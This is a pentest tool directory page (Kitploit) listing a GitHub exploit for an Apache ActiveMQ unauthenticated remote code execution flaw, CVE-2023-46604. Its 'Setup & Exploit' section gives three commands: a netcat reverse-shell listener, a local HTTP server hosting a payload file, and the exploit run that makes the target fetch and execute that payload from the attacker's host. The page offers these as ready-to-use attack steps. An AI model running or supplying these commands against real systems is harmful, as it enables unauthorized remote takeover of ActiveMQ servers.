Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2023-46604-RCE — CVE-2023-46604-RCE exploit with Linux reverse shell payload | Kitploit
Tools/GitHubGitHub/reggyraider/cve-2023-46604-rce
Payload GenerationVulnerability AnalysisExploitationShellcodeWeb Application ExploitationRemote Access Tool
GitHubreggyraider/cve-2023-46604-rce

CVE-2023-46604-RCE

CVE-2023-46604-RCE exploit with Linux reverse shell payload

View Repository
2 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2023-46604-RCE

Python implementation of Apache ActiveMQ Unauthenticated Remote Code Execution

Setup & Exploit

nc -lvnp 4444 -> Start Listener
python3 -m http.server 8080 -> Host poc.xml that contain your payload
python3 CVE-2023-46604-RCE.py -i <Target-IP> -p <Target-Port> -u http://<Your-IP>:8080/poc.xml -> Start exploit

Download Tool